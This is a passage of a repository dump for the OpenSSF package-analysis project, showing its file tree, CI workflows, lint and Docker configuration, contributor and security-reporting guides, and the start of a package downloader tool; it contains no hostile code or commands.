├── .dockerignore
├── .github
    ├── dependabot.yml
    └── workflows
    │   ├── build-images.yml
    │   ├── build.yml
    │   ├── codeql-analysis.yml
    │   ├── depsreview.yml
    │   ├── osv-scanner-pr.yml
    │   ├── osv-scanner-scheduled.yml
    │   ├── scorecards-analysis.yml
    │   ├── shellcheck.yml
    │   └── test.yml
├── .gitignore
├── .golangci.yml
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── LICENSE
├── Makefile
├── README.md
├── SECURITY.md
├── cmd
    ├── analyze
    │   ├── Dockerfile
    │   └── main.go
    ├── downloader
    │   ├── README.md
    │   └── main.go
    ├── scheduler
    │   ├── Dockerfile
    │   ├── README.md
    │   ├── config
    │   │   └── deployment.yaml
    │   ├── main.go
    │   └── proxy
    │   │   └── proxy.go
    └── worker
    │   ├── config.go
    │   ├── main.go
    │   └── pubsubextender
    │       ├── extender.go
    │       ├── extender_test.go
    │       ├── gcpdriver.go
    │       ├── gcpdriver_test.go
    │       └── noopdriver.go
├── configs
    └── e2e
    │   ├── .gitignore
    │   ├── config
    │       └── feeds.yml
    │   └── docker-compose.yml
├── docs
    ├── case_studies.md
    ├── data_schema.md
    ├── images
    │   ├── Pipeline diagram.png
    │   ├── npm_depconf-typosquat_1.png
    │   ├── npm_random_vouchercode-generator_1.png
    │   ├── npm_random_vouchercode-generator_2.png
    │   ├── npm_roku_web_core-ajax_1.png
    │   ├── pypi_discordcmd_1.png
    │   ├── pypi_discordcmd_2.png
    │   └── pypi_secrevthree_1.png
    └── queries.md
├── examples
    ├── README.md
    ├── custom-sandbox
    │   ├── Dockerfile
    │   ├── Makefile
    │   ├── README.md
    │   └── analyze.php
    └── e2e
    │   └── README.md
├── function
    └── loader
    │   ├── README.md
    │   ├── dynamic-analysis-schema.json
    │   ├── go.mod
    │   ├── go.sum
    │   ├── load.go
    │   └── static-analysis-schema.json
├── go.mod
├── go.sum
├── infra
    ├── README.md
    ├── cloudbuild
    │   ├── dynamic_loader
    │   │   └── cloudbuild.yaml
    │   └── image_build
    │   │   └── cloudbuild.yaml
    ├── terraform
    │   ├── analysis.tf
    │   ├── build
    │   │   ├── main.tf
    │   │   └── variables.tf
    │   ├── docker_registry
    │   │   ├── main.tf
    │   │   └── variables.tf
    │   ├── metrics
    │   │   ├── log_metrics.tf
    │   │   └── variables.tf
    │   ├── terraform.tfvars
    │   └── variables.tf
    └── worker
    │   ├── scaler.yaml
    │   └── workers-set.yaml
├── internal
    ├── analysis
    │   ├── mode.go
    │   └── status.go
    ├── dnsanalyzer
    │   └── dnsanalyzer.go
    ├── dynamicanalysis
    │   ├── analysis.go
    │   └── sandbox_args.go
    ├── featureflags
    │   ├── featureflags.go
    │   ├── featureflags_test.go
    │   └── features.go
    ├── log
    │   ├── context.go
    │   ├── context_test.go
    │   ├── log.go
    │   ├── log_test.go
    │   ├── writer.go
    │   └── writer_test.go
    ├── notification
    │   └── notification.go
    ├── packetcapture
    │   └── packetcapture.go
    ├── pkgmanager
    │   ├── crates.io.go
    │   ├── download.go
    │   ├── download_test.go
    │   ├── ecosystem.go
    │   ├── npm.go
    │   ├── package.go
    │   ├── packagist.go
    │   ├── pypi.go
    │   └── rubygems.go
    ├── resultstore
    │   ├── result.go
    │   ├── resultstore.go
    │   └── resultstore_test.go
    ├── sandbox
    │   ├── copy_args.go
    │   ├── copy_args_test.go
    │   ├── init.go
    │   └── sandbox.go
    ├── staticanalysis
    │   ├── analyze.go
    │   ├── analyze_test.go
    │   ├── basicdata
    │   │   ├── basic_data.go
    │   │   ├── basic_data_test.go
    │   │   └── describe_files.go
    │   ├── externalcmd
    │   │   ├── input_strategy.go
    │   │   └── input_strategy_test.go
    │   ├── linelengths
    │   │   ├── line_lengths.go
    │   │   └── line_lengths_test.go
    │   ├── parsing
    │   │   ├── analyze.go
    │   │   ├── analyze_test.go
    │   │   ├── babel-parser.js
    │   │   ├── init_parser.go
    │   │   ├── js_parsing.go
    │   │   ├── js_parsing_test.go
    │   │   ├── package-lock.json
    │   │   ├── package.json
    │   │   ├── parsing_types.go
    │   │   ├── result.go
    │   │   └── string_regexp.go
    │   ├── result.go
    │   ├── result_test.go
    │   ├── signals
    │   │   ├── analyze.go
    │   │   ├── detections
    │   │   │   ├── addresses.go
    │   │   │   ├── addresses_test.go
    │   │   │   ├── base64.go
    │   │   │   ├── base64_test.go
    │   │   │   ├── escape_sequences.go
    │   │   │   ├── escape_sequences_test.go
    │   │   │   ├── hex_strings.go
    │   │   │   ├── hex_strings_test.go
    │   │   │   └── suspicious_identifiers.go
    │   │   ├── file_signals.go
    │   │   ├── file_signals_test.go
    │   │   ├── stats
    │   │   │   ├── sample_statistics.go
    │   │   │   └── sample_statistics_test.go
    │   │   └── stringentropy
    │   │   │   ├── string_entropy.go
    │   │   │   └── string_entropy_test.go
    │   └── task.go
    ├── strace
    │   ├── strace.go
    │   └── strace_test.go
    ├── useragent
    │   ├── useragent.go
    │   └── useragent_test.go
    ├── utils
    │   ├── archive_extract.go
    │   ├── archive_extract_test.go
    │   ├── combine_regexp.go
    │   ├── combine_regexp_test.go
    │   ├── comma_separated_flags.go
    │   ├── equals.go
    │   ├── file_write_data_utils.go
    │   ├── hash_file.go
    │   ├── hash_file_test.go
    │   ├── last_bytes.go
    │   ├── last_bytes_test.go
    │   ├── remove_duplicates.go
    │   ├── transform.go
    │   └── write_file.go
    └── worker
    │   ├── code_execution.go
    │   ├── logging.go
    │   ├── resolvepackage.go
    │   ├── rundynamic.go
    │   ├── runstatic.go
    │   ├── sandbox_options.go
    │   ├── save_data.go
    │   └── savefilewriteresults.go
├── osv-scanner.toml
├── pkg
    ├── api
    │   ├── analysisrun
    │   │   ├── key.go
    │   │   ├── key_test.go
    │   │   ├── phase.go
    │   │   └── result.go
    │   ├── notification
    │   │   └── notification.go
    │   ├── pkgecosystem
    │   │   ├── ecosystem.go
    │   │   └── ecosystem_test.go
    │   └── staticanalysis
    │   │   ├── record.go
    │   │   ├── signals.go
    │   │   └── token
    │   │       ├── identifier_type.go
    │   │       ├── position.go
    │   │       └── tokens.go
    └── valuecounts
    │   ├── value_counts.go
    │   └── value_counts_test.go
├── sample_packages
    ├── Makefile
    ├── README.md
    └── sample_python_package
    │   ├── Dockerfile
    │   ├── pyproject.toml
    │   ├── setup.py
    │   └── src
    │       ├── __init__.py
    │       └── example.py
├── sandboxes
    ├── README.md
    ├── dynamicanalysis
    │   ├── Dockerfile
    │   ├── analyze-node.js
    │   ├── analyze-php.php
    │   ├── analyze-python.py
    │   ├── analyze-ruby.rb
    │   ├── analyze-rust.py
    │   ├── bowerrc
    │   └── pypi-packages.txt
    └── staticanalysis
    │   ├── Dockerfile
    │   └── staticanalyze.go
├── scripts
    ├── analyse-tarballs.sh
    ├── bq_load.sh
    ├── deploy.sh
    ├── format-static-analysis-json.py
    └── run_analysis.sh
├── test
    └── e2e
    │   ├── README.md
    │   └── docker-compose.test.yml
└── tools
    ├── README.md
    ├── analysis
        ├── README.md
        ├── analysis_runner.py
        ├── backfill.sh
        ├── node.txt
        ├── python.txt
        └── rubygems.txt
    ├── gvisor
        ├── README.md
        └── runsc_compat.sh
    └── network
        ├── iptables.rules
        └── podman-analysis.conflist


/.dockerignore:
--------------------------------------------------------------------------------
 1 | # What to ignore while building Go based cmd container images.
 2 | # This helps make the images build a lot faster.
 3 | build
 4 | infra
 5 | examples
 6 | function/loader/**
 7 | sandboxes
 8 | internal/staticanalysis/parsing/js/node_modules
 9 | node_modules
10 | web
11 | 
12 | # Docker builds the static analysis sandbox image in
13 | # the top-level project directory, so needs to copy
14 | # from this subdirectory during the build
15 | !sandboxes/staticanalysis
16 | 
17 | # Don't ignore any go mod or sum files; go build needs them
18 | # Note: this rule won't work if the parent directory of a
19 | # go.mod or go.sum file is excluded
20 | !**/go.mod
21 | !**/go.sum
22 | 


--------------------------------------------------------------------------------
/.github/dependabot.yml:
--------------------------------------------------------------------------------
 1 | version: 2
 2 | updates:
 3 | - package-ecosystem: "gomod"
 4 |   directory: "/"
 5 |   schedule:
 6 |     interval: "monthly"
 7 |   open-pull-requests-limit: 10
 8 |   groups:
 9 |     gomod-minor-updates:
10 |       update-types:
11 |         - "minor"
12 |         - "patch"
13 | - package-ecosystem: "gomod"
14 |   directory: "/function/loader"
15 |   schedule:
16 |     interval: "monthly"
17 |   open-pull-requests-limit: 10
18 |   groups:
19 |     loader-minor-updates:
20 |       update-types:
21 |         - "minor"
22 |         - "patch"
23 | - package-ecosystem: "github-actions"
24 |   directory: "/"
25 |   schedule:
26 |     interval: "monthly"
27 |   groups:
28 |     actions-minor-updates:
29 |       update-types:
30 |         - "minor"
31 |         - "patch"
32 | - package-ecosystem: "npm"
33 |   directory: "/internal/staticanalysis/parsing"
34 |   schedule:
35 |     interval: "monthly"
36 |   groups:
37 |     parsing-minor-updates:
38 |       update-types:
39 |         - "minor"
40 |         - "patch"
41 | 


--------------------------------------------------------------------------------
/.github/workflows/build-images.yml:
--------------------------------------------------------------------------------
 1 | name: "Build docker"
 2 | 
 3 | on:
 4 |   pull_request:
 5 | 
 6 |   push:
 7 |     paths-ignore:
 8 |       - '**.md'
 9 | 
10 | permissions: read-all
11 | 
12 | jobs:
13 |   build_docker:
14 |     runs-on: ubuntu-latest
15 |     steps:
16 |     - name: Checkout
17 |       uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
18 | 
19 |     - name: setup-go
20 |       uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0
21 |       with:
22 |         go-version-file: 'go.mod'
23 | 
24 |     - name: Enable docker experimental
25 |       run: |
26 |         echo $'{"experimental": true}' | sudo dd status=none of=/etc/docker/daemon.json
27 |         sudo service docker restart
28 |         docker version -f '{{.Server.Experimental}}'
29 | 
30 |     - name: build_docker
31 |       run: make build
32 | 


--------------------------------------------------------------------------------
/.github/workflows/build.yml:
--------------------------------------------------------------------------------
 1 | name: "Build"
 2 | 
 3 | on:
 4 |   pull_request:
 5 | 
 6 | permissions: read-all
 7 | 
 8 | jobs:
 9 |   Build:
10 |     runs-on: ubuntu-latest
11 |     steps:
12 |     - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
13 |     - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0
14 |       with:
15 |         go-version-file: 'go.mod'
16 |     - name: Install libpcap-dev
17 |       run: sudo apt-get install -y libpcap-dev
18 |     - run: go build -o scheduler ./cmd/scheduler
19 |     - run: go build -o worker ./cmd/worker
20 |     - run: go build -o analyze ./cmd/analyze
21 |     - run: go build -o loader load.go
22 |       working-directory: function/loader
23 |     - run: go build -o staticanalyze staticanalyze.go
24 |       working-directory: sandboxes/staticanalysis
25 | 


--------------------------------------------------------------------------------
/.github/workflows/codeql-analysis.yml:
--------------------------------------------------------------------------------
 1 | # https://docs.github.com/en/free-pro-team@latest/github/finding-security-vulnerabilities-and-errors-in-your-code/configuring-code-scanning#changing-the-languages-that-are-analyzed
 2 | name: "CodeQL"
 3 | 
 4 | on:
 5 |   push:
 6 |     branches: [ main ]
 7 |     paths-ignore:
 8 |       - '**.md'
 9 |   pull_request:
10 |     # The branches below must be a subset of the branches above
11 |     branches: [ main ]
12 |     paths-ignore:
13 |       - '**.md'
14 |   schedule:
15 |     - cron: '22 19 * * 0'
16 | 
17 | permissions: read-all
18 | 
19 | jobs:
20 |   analyze:
21 |     name: Analyze
22 |     runs-on: ubuntu-latest
23 |     permissions:
24 |       security-events: write
25 |       actions: read
26 |       contents: read
27 | 
28 |     strategy:
29 |       fail-fast: false
30 |       matrix:
31 |         language: [ 'go' ]
32 |         # CodeQL supports [ 'cpp', 'csharp', 'go', 'java', 'javascript', 'python' ]
33 |         # Learn more:
34 | 
35 |     steps:
36 |     - name: Checkout repository
37 |       uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
38 | 
39 |     - name: setup-go
40 |       uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0
41 |       with:
42 |         go-version-file: 'go.mod'
43 | 
44 |     # Initializes the CodeQL tools for scanning.
45 |     - name: Initialize CodeQL
46 |       uses: github/codeql-action/init@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1
47 |       with:
48 |         languages: ${{ matrix.language }}
49 | 
50 |     - name: Autobuild
51 |       uses: github/codeql-action/autobuild@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1
52 | 
53 |     - name: Perform CodeQL Analysis
54 |       uses: github/codeql-action/analyze@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1
55 | 


--------------------------------------------------------------------------------
/.github/workflows/depsreview.yml:
--------------------------------------------------------------------------------
 1 | name: 'Dependency Review'
 2 | 
 3 | on:
 4 |   pull_request:
 5 |     paths-ignore:
 6 |       - '**.md'
 7 | 
 8 | permissions:
 9 |   contents: read
10 | 
11 | jobs:
12 |   dependency-review:
13 |     runs-on: ubuntu-latest
14 |     steps:
15 |       - name: 'Checkout Repository'
16 |         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
17 |       - name: 'Dependency Review'
18 |         uses: actions/dependency-review-action@3b139cfc5fae8b618d3eae3675e383bb1769c019 # v4.5.0
19 | 


--------------------------------------------------------------------------------
/.github/workflows/osv-scanner-pr.yml:
--------------------------------------------------------------------------------
 1 | name: OSV-Scanner PR Scan
 2 | 
 3 | # Change "main" to your default branch if you use a different name, i.e. "master"
 4 | on:
 5 |   pull_request:
 6 |     branches: [ main ]
 7 |   merge_group:
 8 |     branches: [ main ]
 9 | 
10 | # Declare default permissions as read only.
11 | permissions:
12 |   actions: read
13 |   contents: read
14 |   # Require writing security events to upload SARIF file to security tab
15 |   security-events: write
16 | 
17 | jobs:
18 |   scan-pr:
19 |     uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable-pr.yml@v1.9.2"
20 | 


--------------------------------------------------------------------------------
/.github/workflows/osv-scanner-scheduled.yml:
--------------------------------------------------------------------------------
 1 | name: OSV-Scanner Scheduled Scan
 2 | 
 3 | on:
 4 |   schedule:
 5 |     - cron: '50 1 * * 6' # run at 01:50 UTC every Saturday
 6 | # Change "main" to your default branch if you use a different name, i.e. "master"
 7 |   push:
 8 |     branches: [ main ]
 9 | 
10 | permissions:
11 |   actions: read
12 |   contents: read
13 |   # Require writing security events to upload SARIF file to security tab
14 |   security-events: write
15 | 
16 | jobs:
17 |   scan-scheduled:
18 |     uses: "google/osv-scanner-action/.github/workflows/osv-scanner-reusable.yml@v1.9.2"
19 | 


--------------------------------------------------------------------------------
/.github/workflows/scorecards-analysis.yml:
--------------------------------------------------------------------------------
 1 | name: Scorecards supply-chain security
 2 | on:
 3 |   # Only the default branch is supported.
 4 |   branch_protection_rule:
 5 |   schedule:
 6 |     - cron: '21 11 * * 0'
 7 |   push:
 8 |     branches: [ main ]
 9 |     paths-ignore:
10 |       - '**.md'
11 | 
12 | # Declare default permissions as read only.
13 | permissions: read-all
14 | 
15 | jobs:
16 |   analysis:
17 |     name: Scorecards analysis
18 |     runs-on: ubuntu-latest
19 |     permissions:
20 |       # Needed to upload the results to code-scanning dashboard.
21 |       security-events: write
22 |       actions: read
23 |       contents: read
24 |       id-token: write
25 | 
26 |     steps:
27 |       - name: "Checkout code"
28 |         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
29 |         with:
30 |           persist-credentials: false
31 | 
32 |       - name: "Run analysis"
33 |         uses: ossf/scorecard-action@62b2cac7ed8198b15735ed49ab1e5cf35480ba46 # v2.4.0
34 |         with:
35 |           results_file: results.sarif
36 |           results_format: sarif
37 |           repo_token: ${{ secrets.GITHUB_TOKEN }}
38 |           # Publish the results for public repositories to enable scorecard badges. For more details, see
39 |           # https://github.com/ossf/scorecard-action#publishing-results. 
40 |           # For private repositories, `publish_results` will automatically be set to `false`, regardless 
41 |           # of the value entered here.
42 |           publish_results: true
43 |           
44 |       # Upload the results as artifacts (optional).
45 |       - name: "Upload artifact"
46 |         uses: actions/upload-artifact@65c4c4a1ddee5b72f698fdd19549f0f0fb45cf08 # v4.6.0
47 |         with:
48 |           name: SARIF file
49 |           path: results.sarif
50 |           retention-days: 5
51 | 
52 |       # Upload the results to GitHub's code scanning dashboard.
53 |       - name: "Upload to code-scanning"
54 |         uses: github/codeql-action/upload-sarif@b6a472f63d85b9c78a3ac5e89422239fc15e9b3c # v3.28.1
55 |         with:
56 |           sarif_file: results.sarif
57 | 


--------------------------------------------------------------------------------
/.github/workflows/shellcheck.yml:
--------------------------------------------------------------------------------
 1 | 
 2 | name: 'Shellcheck'
 3 | 
 4 | on:
 5 |   push:
 6 |     paths:
 7 |       - '**.sh'
 8 | 
 9 |   pull_request:
10 |     paths:
11 |       - '**.sh'
12 | 
13 | permissions:
14 |   contents: read
15 | 
16 | jobs:
17 |   check-scripts:
18 |     runs-on: ubuntu-latest
19 |     steps:
20 |       - name: 'Checkout Repository'
21 |         uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
22 |       - name: 'Check scripts in all directories'
23 |         run: make check_scripts
24 | 


--------------------------------------------------------------------------------
/.github/workflows/test.yml:
--------------------------------------------------------------------------------
 1 | name: "Test"
 2 | 
 3 | on:
 4 |   pull_request:
 5 |     paths-ignore:
 6 |       - '**.md'
 7 | 
 8 | permissions: read-all
 9 | 
10 | jobs:
11 |   run-tests:
12 |     runs-on: ubuntu-latest
13 |     steps:
14 |     - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
15 |     - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0
16 |       with:
17 |         go-version-file: 'go.mod'
18 |     - uses: actions/setup-node@39370e3970a6d050c480ffad4ff0ed4d3fdee5af # v4.1.0
19 |       with:
20 |         node-version: 18
21 |     - name: Install libpcap-dev
22 |       run: sudo apt-get install -y libpcap-dev
23 |     - name: Run tests
24 |       run: go test -v -skip "TestDownload/crates.io_rand_valid_version" ./...
25 |   run-linter:
26 |     runs-on: ubuntu-latest
27 |     steps:
28 |     - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
29 |     - uses: actions/setup-go@3041bf56c941b39c61721a86cd11f3bb1338122a # v5.2.0
30 |       with:
31 |         go-version-file: 'go.mod'
32 |     - name: golangci-lint
33 |       uses: golangci/golangci-lint-action@971e284b6050e8a5849b72094c50ab08da042db8 # v6.1.1
34 | 


--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
 1 | # Binaries for programs and plugins
 2 | *.exe
 3 | *.exe~
 4 | *.dll
 5 | *.so
 6 | *.dylib
 7 | 
 8 | # Test binary, built with `go test -c`
 9 | *.test
10 | 
11 | # Output of the go coverage tool, specifically when used with LiteIDE
12 | *.out
13 | 
14 | # Dependency directories (remove the comment below to include it)
15 | # vendor/
16 | 
17 | .terraform*
18 | *.tfstate
19 | 
20 | # node_modules folders containing JS dependencies
21 | # these should be pre-installed where needed
22 | node_modules/
23 | 
24 | 


--------------------------------------------------------------------------------
/.golangci.yml:
--------------------------------------------------------------------------------
  1 | ---
  2 | run:
  3 |   concurrency: 6
  4 |   timeout: 5m
  5 | issues:
  6 |   # Maximum issues count per one linter.
  7 |   # Set to 0 to disable.
  8 |   # Default: 50
  9 |   max-issues-per-linter: 0
 10 |   # Maximum count of issues with the same text.
 11 |   # Set to 0 to disable.
 12 |   # Default: 3
 13 |   max-same-issues: 0
 14 |   # Exclude previously existing issues from the report
 15 |   new: true
 16 |   new-from-rev: HEAD
 17 | linters:
 18 |   disable-all: true
 19 |   enable:
 20 |     - asciicheck
 21 |     - bodyclose
 22 |     - copyloopvar
 23 |     - depguard
 24 |     - dogsled
 25 |     - errcheck
 26 |     - errorlint
 27 |     - exhaustive
 28 |     - gci
 29 |     #- gochecknoinits
 30 |     - gocognit
 31 |     - goconst
 32 |     - gocritic
 33 |     - gocyclo
 34 |     - godot
 35 |     - godox
 36 |     #- goerr113
 37 |     - gofmt
 38 |     - gofumpt
 39 |     - goheader
 40 |     - goimports
 41 |     - gomodguard
 42 |     - goprintffuncname
 43 |     - gosec
 44 |     - gosimple
 45 |     #- govet
 46 |     - ineffassign
 47 |     #- lll
 48 |     - makezero
 49 |     - misspell
 50 |     - nakedret
 51 |     - nestif
 52 |     - noctx
 53 |     - nolintlint
 54 |     #- paralleltest
 55 |     - predeclared
 56 |     - staticcheck
 57 |     - stylecheck
 58 |     - thelper
 59 |     - tparallel
 60 |     - typecheck
 61 |     - unconvert
 62 |     - unparam
 63 |     - unused
 64 |     - whitespace
 65 |     - wrapcheck
 66 | linters-settings:
 67 |   errcheck:
 68 |     check-type-assertions: true
 69 |     check-blank: true
 70 |   exhaustive:
 71 |     # https://golangci-lint.run/usage/linters/#exhaustive
 72 |     default-signifies-exhaustive: true
 73 |   govet:
 74 |     enable:
 75 |       - fieldalignment
 76 |   godox:
 77 |     keywords:
 78 |       - BUG
 79 |       - FIXME
 80 |       - HACK
 81 |   gci:
 82 |     sections:
 83 |       - standard
 84 |       - default
 85 |       - prefix(github.com/ossf/package-analysis)
 86 |   gocritic:
 87 |     enabled-checks:
 88 |       # Diagnostic
 89 |       - appendAssign
 90 |       - badCond
 91 |       - caseOrder
 92 |       - codegenComment
 93 |       - commentedOutCode
 94 |       - deprecatedComment
 95 |       - dupBranchBody
 96 |       - dupCase
 97 |       - dupSubExpr
 98 |       - exitAfterDefer
 99 |       - flagName
100 |       - nilValReturn
101 |       - weakCond
102 |       - octalLiteral
103 | 
104 |       # Performance
105 |       - appendCombine
106 |         #- hugeParam
107 |       - rangeExprCopy
108 |       - rangeValCopy
109 | 
110 |       # Style
111 |       - boolExprSimplify
112 |       - captLocal
113 |       - commentFormatting
114 |       - commentedOutImport
115 |       - defaultCaseOrder
116 |       - docStub
117 |       - elseif
118 |       - emptyFallthrough
119 |       - hexLiteral
120 |       - ifElseChain
121 |       - methodExprCall
122 |       - singleCaseSwitch
123 |       - typeAssertChain
124 |       - typeSwitchVar
125 |       - underef
126 |       - unlabelStmt
127 |       - unlambda
128 | 
129 | 


--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
 1 | # Contributing to Package Analysis
 2 | 
 3 | Hello new contributor! Thank you for contributing your time and expertise to the Package Analysis project.
 4 | We're delighted to have you on board.
 5 | 
 6 | This document describes the contribution guidelines for the project.
 7 | 
 8 | ## Ways to get in touch
 9 | 
10 | If you have any contribution-related questions, please get in touch! Here are some ways to reach current contributors
11 | 1. Open a new issue (strongly preferred)
12 | 1. Via the [OpenSSF Securing Critical Projects Working Group](https://github.com/ossf/wg-securing-critical-projects) mailing list or Slack channel
13 | 
14 | Note: for minor changes (typos, documentation improvements), feel free to open a pull request directly.
15 | 
16 | **Note:** Before you start contributing, you must read and abide by our
17 | **[Code of Conduct](./CODE_OF_CONDUCT.md)**.
18 | 
19 | ## Contributing code
20 | 
21 | ### Getting started
22 | 
23 | 1.  Create [a GitHub account](https://github.com/join)
24 | 1.  Set up your [development environment](#environment-setup)
25 | 
26 | ## Environment Setup
27 | 
28 | You must install these tools:
29 | 
30 | 1.  [`git`](https://help.github.com/articles/set-up-git/): For source control.
31 | 1.  [`go`](https://go.dev/dl/): For running code.
32 | 1.  `make`: For running development commands
33 | 
34 | For running/testing locally, the following additional tools are required:
35 | 
36 | 1.  [`docker`](https://www.docker.com/get-started/): The external container
37 | 1.  [`podman`](https://podman.io/getting-started/): The internal container
38 | 1.  [`docker-compose`](https://docs.docker.com/compose/install/) for end-to-end testing
39 | 
40 | Then clone the repository, e.g:
41 | 
42 | ```shell
43 | $ git clone git@github.com:ossf/package-analysis.git
44 | $ cd package-analysis
45 | ```
46 | 
47 | ## Notes on style
48 | 
49 | ### Commit style
50 | 
51 | Prefer smaller PRs to make reviewing easier. Larger changes can be split into smaller PRs by branching off previous (unmerged) branches rather than main.
52 | 
53 | ### Code style
54 | 
55 | We generally follow the [Google Go Style Guide](https://google.github.io/styleguide/go/index).
56 | 
57 | #### Warnings
58 | 
59 | Some things that are OK:
60 | 
61 | - not handling the error when `defer` close() on an HTTP response body
62 | 
63 | #### Comments
64 | 
65 | Follow official Go comment style: https://tip.golang.org/doc/comment.
66 | In particular, all exported (capitalised) types and functions should have a comment explaining what they do.
67 | The comment should start with the type/function name.
68 | 
69 | #### Imports
70 | 
71 | - stdlib imports grouped first, then 3rd party packages, then local imports
72 | - each group separated by a blank line and ordered alphabetically
73 | 
74 | ##### on IntelliJ
75 | 
76 | - Remove redundant import aliases: yes
77 | - Sorting type: gofmt
78 | - Move all imports into a single declaration: yes
79 | - Group stdlib imports: yes
80 | - Move all stdlib imports in a single group: yes
81 | - Group: yes, current project packages
82 | 
83 | 


--------------------------------------------------------------------------------
/SECURITY.md:
--------------------------------------------------------------------------------
 1 | # Reporting Security Issues
 2 | 
 3 | To report a security issue, please email
 4 | [oss-security@googlegroups.com](mailto:oss-security@googlegroups.com)
 5 | with a description of the issue, the steps you took to create the issue,
 6 | affected versions, and, if known, mitigations for the issue.
 7 | 
 8 | Our vulnerability management team will respond within 3 working days of your
 9 | email. If the issue is confirmed as a vulnerability, we will open a
10 | Security Advisory and acknowledge your contributions as part of it. This project
11 | follows a 90 day disclosure timeline.
12 | 
13 | Additionally, vulnerabilities can be reported to repository maintainers
14 | [here on Github](https://github.com/ossf/package-analysis/security/advisories/new).
15 | 


--------------------------------------------------------------------------------
/cmd/analyze/Dockerfile:
--------------------------------------------------------------------------------
 1 | FROM golang:1.23.1@sha256:4a3c2bcd243d3dbb7b15237eecb0792db3614900037998c2cd6a579c46888c1e as build
 2 | RUN apt-get update && apt-get install -y libpcap-dev
 3 | WORKDIR /src
 4 | 
 5 | # First cache the dependencies to avoid downloading again on code change
 6 | COPY ./go.mod ./
 7 | COPY ./go.sum ./
 8 | RUN go mod download
 9 | 
10 | COPY . ./
11 | RUN go build -o analyze ./cmd/analyze && go build -o worker ./cmd/worker
12 | 
13 | FROM ubuntu:22.04@sha256:42ba2dfce475de1113d55602d40af18415897167d47c2045ec7b6d9746ff148f
14 | 
15 | ENV DEBIAN_FRONTEND noninteractive
16 | RUN apt-get update && apt-get upgrade -y && \
17 |     apt-get install -y \
18 |         apt-transport-https \
19 |         ca-certificates \
20 |         curl \
21 |         iptables \
22 |         iproute2 \
23 |         podman \
24 |         software-properties-common && \
25 |     update-alternatives --set iptables /usr/sbin/iptables-legacy && \
26 |     update-alternatives --set ip6tables /usr/sbin/ip6tables-legacy
27 | 
28 | # Install gVisor.
29 | RUN mkdir -m 0700 -p /etc/apt/keyrings && \
30 |     curl -fsSL https://gvisor.dev/archive.key -o /etc/apt/keyrings/gvisor.key && \
31 |     echo "deb [signed-by=/etc/apt/keyrings/gvisor.key] https://storage.googleapis.com/gvisor/releases 20240212 main" > /etc/apt/sources.list.d/gvisor.list && \
32 |     apt-get update && apt-get install -y runsc
33 | 
34 | COPY --from=build /src/analyze /usr/local/bin/analyze
35 | COPY --from=build /src/worker /usr/local/bin/worker
36 | COPY --from=build /src/tools/gvisor/runsc_compat.sh /usr/local/bin/runsc_compat.sh
37 | COPY --from=build /src/tools/network/iptables.rules /usr/local/etc/iptables.rules
38 | COPY --from=build /src/tools/network/podman-analysis.conflist /etc/cni/net.d/podman-analysis.conflist
39 | RUN chmod 755 /usr/local/bin/runsc_compat.sh && \
40 |     chmod 644 /usr/local/etc/iptables.rules /etc/cni/net.d/podman-analysis.conflist
41 | 
42 | ARG SANDBOX_IMAGE_TAG
43 | ENV OSSF_SANDBOX_IMAGE_TAG=${SANDBOX_IMAGE_TAG}
44 | 


--------------------------------------------------------------------------------
/cmd/downloader/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # Package Download tool
 3 | 
 4 | This tool enables easy batch download of many packages to a local directory,
 5 | which may be useful for testing or running analysis locally.
 6 | 
 7 | ## Building
 8 | 
 9 | ```bash
10 | go build -o downloader main.go
11 | ```
12 | 
13 | ## Running
14 | 
15 | ```bash
16 | ./downloader -f <packages.txt> -d <dir>
17 | ```
18 | 
19 | There are two options to the downloader tool:
20 | 
21 | 1. List of packages to download (mandatory)
22 | 2. Destination directory to download to (optional)
23 | 
24 | If `-d` is not specified, packages will be downloaded to the current directory.
25 | 
26 | The file containing the list of packages to download must have the following structure:
27 | 
28 | 1. Each line of the file specifies one package to download in
29 |    [Package URL](https://github.com/package-url/purl-spec) format
30 | 2. Package ecosystem and name are required, version is optional
31 | 3. If the version is not given, the latest version is downloaded
32 | 
33 | Here are some examples of Package URLs (purls):
34 | 
35 | - `pkg:npm/async`: NPM package `async`, no version specified
36 | - `pkg:pypi/requests@2.31.0`: PyPI package `requests`, version 2.31.0
37 | - `pkg:npm/%40babel/runtime`: NPM package `@babel/runtime` (note: percent encoding is not required by this tool)
38 | 
39 | If Package URL is invalid or a package fails to download, the error will be printed but will not stop the program;
40 | remaining package downloads will still be attempted.


--------------------------------------------------------------------------------
/cmd/downloader/main.go:
--------------------------------------------------------------------------------
  1 | package main
  2 | 
  3 | import (
  4 | 	"bufio"
  5 | 	"errors"
  6 | 	"flag"
  7 | 	"fmt"
  8 | 	"net/http"
  9 | 	"os"
 10 | 	"strings"
 11 | 
 12 | 	"github.com/package-url/packageurl-go"
 13 | 
 14 | 	"github.com/ossf/package-analysis/internal/useragent"
 15 | 	"github.com/ossf/package-analysis/internal/worker"
 16 | )
 17 | 
 18 | // Command-line tool to download a list of package archives, specified by purl
 19 | // See https://github.com/package-url/purl-spec
 20 | var (
 21 | 	purlFilePath = flag.String("f", "", "file containing list of package URLs")
